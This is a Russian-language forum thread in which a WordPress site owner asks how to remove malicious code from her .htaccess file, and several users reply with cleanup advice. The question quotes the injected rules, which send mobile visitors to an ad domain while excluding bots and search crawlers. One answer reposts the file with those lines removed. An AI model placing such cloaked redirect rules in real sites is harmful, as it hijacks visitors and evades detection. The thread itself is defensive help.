Как удалить вредоносный код из файла htaccess?

Question

[nogames]

Яндекс.Вебмастер сообщил, что у меня на сайте имеется вредоносный код, который форвардит куда-то не туда пользователей мобильной версии.

Вот что я обнаружила в файле htaccess:

php_value memory_limit 50M
#RewriteCond %{HTTP_HOST} !^mydomain\.ru$ [NC]
#RewriteRule ^(.*)$ mydomain.ru/$1 [R=301,L]
# BEGIN WordPress

RewriteEngine on
RewriteCond %{HTTP_USER_AGENT} (adr|android|midp|j2me|symbian|series\ 60|symbos|windows\ mobile|windows\ ce|smartphone|blackberry|mtk|windows\ phone|iemobile|nokia|ucweb|ucbrowser|iPad|iPhone) [NC]
RewriteCond %{HTTP_USER_AGENT} !(bot|ia_archiver|crawler|slurp|validator|webalta|yahoo|yandex|google|curl|wget) [NC]
RewriteRule (.*) pda.whiteads.biz/?29&source=mydomain2.ru [L,R=302] # On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

# END WordPress

*Заменила адрес своего сайта на mydomain.
**mydomain2.ru - это зеркало моего основного домена, с которого, по идее, должен идти форвард на основной домен.

Вот тут вот (toster.ru/q/23715) был похожий вопрос, и топик-стартеру посоветовали проверить htaccess на наличие конструкций типа той, что у меня.

Я не программист, поэтому не понимаю, что в этом коде нужно, а что и есть вредоносный код. И да, последняя дата изменения файла соответствует дате, когда один вежливый и обходительный фрилансер сделал мне новую фичу для сайта. Поэтому я теперь как-то опасаюсь давать доступ к сайту незнакомым людям.

Надеюсь на коллективную помощь. Заранее спасибо всем, кто ответит!

Answer 1

[1001001 111]

Дай доступ, исправлю =)))
p.s. Как защитить пользователей мобильной версии сайта/форума от вредоносных банеров/скриптов?

Comments

[nogames]

Спасибо, конечно, но ровно на этот топик и стоит ссылка в моем вопросе

[Сергей Той]

Наверное так и появился вредоносный код :-D

[nogames]

Так а с какой по какую строчку удалять код? Я понимаю, что его туда запихнул фрилансер, а не какой-то неведомый злоумышленник.

Answer 2

[Александр Борисович]

С дистрибутива возьми нормальный htaccess.
Права потом поставь минимальные на этотот файл 600.
И.... ищи еще такие же файлы по все каталогам.
А так же залитый шел, или дорвей - тело вируса.

Answer 3

[Illan]

Обсуждалось тут, даже пример есть:
По какой причине может попасть вирус на сайт (когда заходишь с мобильника)?

Answer 4

[Виктор Таран]

1. Оставляешь так

php_value memory_limit 50M
#RewriteCond %{HTTP_HOST} !^mydomain\.ru$ [NC]
#RewriteRule ^(.*)$ mydomain.ru/$1 [R=301,L]
# BEGIN WordPress

RewriteEngine on
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]

2. Качаешь тут https://revisium.com/ai/ ( для сайтов)
3. Запускаешь или по ssh php -q ai-bolit.php
ну или в браузере и ждешь. Потом просматриваешь то что он нашел и удаляешь ( вдумчиво)
Желательно обновить движок (даже не думай без бэкапа) в идеале нейти уязвимость.